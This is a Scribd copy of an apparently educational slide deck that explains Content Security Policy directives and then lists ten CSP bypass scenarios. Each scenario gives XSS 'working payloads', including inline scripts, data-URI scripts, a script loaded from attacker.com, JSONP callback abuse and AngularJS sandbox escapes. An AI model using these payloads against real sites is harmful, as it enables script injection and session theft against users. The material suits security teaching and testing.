Scribd
Upload
119 views

Content Security Policy: Directives of CSP

The document discusses Content Security Policy (CSP) directives and how they can be bypassed through various techniques: 1. CSP directives like 'unsafe-inline' and 'unsafe-eval' allow scripts to execute that would otherwise be blocked. 2. Misconfigurations that allow external scripts from untrusted domains or data URIs can be leveraged to execute code. 3. AngularJS, prototype.js and other libraries contain APIs that can be abused to execute code even when script-src is limited. 4. Redirects and callbacks can trick the browser into executing code from an allowed domain that was intended for another.

Uploaded by

Мr. X Gaming
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
119 views

Content Security Policy: Directives of CSP

The document discusses Content Security Policy (CSP) directives and how they can be bypassed through various techniques: 1. CSP directives like 'unsafe-inline' and 'unsafe-eval' allow scripts to execute that would otherwise be blocked. 2. Misconfigurations that allow external scripts from untrusted domains or data URIs can be leveraged to execute code. 3. AngularJS, prototype.js and other libraries contain APIs that can be abused to execute code even when script-src is limited. 4. Redirects and callbacks can trick the browser into executing code from an allowed domain that was intended for another.

Uploaded by

Мr. X Gaming
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Content Security Policy

www.spinthehack.in

References Taken : Content Security Bypass Techniques to perform XSS | Medium

▪ Directives of CSP

script-src : This directive specifies allowed sources for


JavaScript. This includes not only URLs loaded directly into <script>
elements, but also things like inline script event handlers (onclick)
and XSLT stylesheets which can trigger script execution.

default-src: This directive defines the policy for fetching


resources by default. When fetch directives are absent in CSP
header the browser follows this directive by default.

Child-src: This directive defines allowed resources for web


workers and embedded frame contents.

connect-src: This directive restricts URLs to load using interfaces


like <a>,fetch,websocket,XMLHttpRequest

frame-src: This directive restricts URLs to which frames can be


called out.

frame-ancestors: This directive specifies the sources that can


embed the current page. This directive applies to <frame>, <iframe>,
<embed>, and <applet> tags. This directive can't be used in <meta>
tags and applies only to non-HTML resources.

img-src: It defines allowed sources to load images on the web page.

Manifest-src: This directive defines allowed sources of application


manifest files.

media-src: It defines allowed sources from where media objects


like <audio>,<video> and <track> can be loaded.
Content Security Policy
www.spinthehack.in

▪ Directives of CSP

object-src: It defines allowed sources for the <object>,<embed>


and <applet> elements.

base-uri: It defines allowed URLs which can be loaded using <base>


element.

form-action: This directive lists valid endpoints for submission


from <form> tags.

plugin-types: It defineslimits the kinds of mime types a page may


invoke.

upgrade-insecure-requests: This directive instructs browsers to


rewrite URL schemes, changing HTTP to HTTPS. This directive can
be useful for websites with large numbers of old URL's that need to
be rewritten.

sandbox: sandbox directive enables a sandbox for the requested


resource similar to the <iframe> sandbox attribute. It applies
restrictions to a page's actions including preventing popups,
preventing the execution of plugins and scripts, and enforcing a
same-origin policy.
Content Security Policy
www.spinthehack.in

▪ Sources of Directives

self : This source defines that loading of resources on the page is


allowed from the same domain.

data: This source allows loading resources via the data scheme (eg
Base64 encoded images)

none: This directive allows nothing to be loaded from any source.

unsafe-eval : This allows the use of eval() and similar methods for
creating code from strings. This is not a safe practice to include this
source in any directive. For the same reason it is named as unsafe.

unsafe-hashes: This allows to enable specific inline event handlers.

unsafe-inline: This allows the use of inline resources, such as inline


<script> elements, javascript: URLs, inline event handlers, and inline
<style> elements. Again this is not recommended for security reasons.

nonce: A whitelist for specific inline scripts using a cryptographic


nonce (number used once). The server must generate a unique nonce
value each time it transmits a policy.
Content Security Policy
www.spinthehack.in

▪ Example of CSP Rules.

Content-Security-Policy: default-src 'self'; script-src


https://spinthehack.in/ ; report-uri /Report-parsing-url;

<img src=image.jpg> This image will be allowed as image


is loading from same domain i.e. spinthehack.in

<script src=script.js> This script will be allowed as the


script is loading from the same domain i.e.
spinthehack.in

<script src=https://evil.com/script.js> This script will


not-allowed as the script is trying to load from
undefined domain i.e. evil.com

"/><script>alert(1337)</script> This will not-allowed


on the page.
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.

Scenario : 1

Content-Security-Policy: script-src https://facebook.com


https://google.com 'unsafe-inline' https://*; child-src
'none'; report-uri /Report-parsing-url;

Working Payload
"/><script>alert(1337);</script>

Scenario : 2

Content-Security-Policy: script-src https://facebook.com


https://google.com 'unsafe-eval' data: http://*; child-src
'none'; report-uri /Report-parsing-url;

Working Payload

<script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWl
uKQ=="></script>
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.

Scenario : 3

Content-Security-Policy: script-src 'self'


https://facebook.com https://google.com https: data *;
child-src 'none'; report-uri /Report-parsing-url;

Working Payload
"/>'><script src=https://attacker.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>

Scenario : 4

Content-Security-Policy: script-src 'self'; object-src


'none' ; report-uri /Report-parsing-url;

Working Payload

"/>'><script src="/user_upload/mypic.png.js"></script>
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.

Scenario : 5

Content-Security-Policy: script-src 'self' report-uri


/Report-parsing-url;

Working Payload
<object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTw
vc2NyaXB0Pg=="></object>

">'><object type="application/x-shockwave-flash"
data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0
r4/build/charts/assets/charts.swf?allowedDomain=\"})))}ca
tch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

Scenario : 6
Content-Security-Policy: script-src 'self'
https://www.google.com ; object-src 'none' ; report-uri
/Report-parsing-url;
Working Payload

"><script
src="https://www.google.com/complete/search?client=chro
me&q=hello&callback=alert#1"></script>
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.


Scenario : 7

Content-Security-Policy: script-src 'self'


https://cdnjs.cloudflare.com/; object-src 'none' ; report-
uri /Report-parsing-url;

Working Payload

<script
src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7
.2/prototype.js"></script>

<script
src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.
8/angular.js" /></script>
<div ng-app ng-csp>
{{ x =
$on.curry.call().eval("fetch('http://localhost/index.php').t
hen(d => {})") }}
</div>

"><script
src="https://cdnjs.cloudflare.com/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.


Scenario : 8
Content-Security-Policy: script-src 'self'
ajax.googleapis.com; object-src 'none' ;report-uri /Report-
parsing-url;

Working Payload

ng-app"ng-csp ng-click=$event.view.alert(1337)><script
src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angula
r.js></script>
"><script
src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%
26callback=alert%26context=1337></script>

Scenario : 9

Content-Security-Policy: script-src 'self'


accounts.google.com/random/ website.with.redirect.com ;
object-src 'none' ; report-uri /Report-parsing-url;
Content Security Policy
www.spinthehack.in

▪ Scenarios of CSP Bypass.

Working Payload
">'><script
src="https://website.with.redirect.com/redirect?url=https
%3A//accounts.google.com/o/oauth2/revoke?callback=alert
(1337)"></script>">

Scenario : 10

Content-Security-Policy:
default-src 'self' data: *; connect-src 'self'; script-src
'self' ;
report-uri /_csp; upgrade-insecure-requests

Working Payload

<iframe srcdoc='<script
src="data:text/javascript,alert(document.domain)"></script
>'></iframe>

<iframe src='data:text/html,<script defer="true"


src="data:text/javascript,document.body.innerText=/hello/
"></script>'></iframe>

You might also like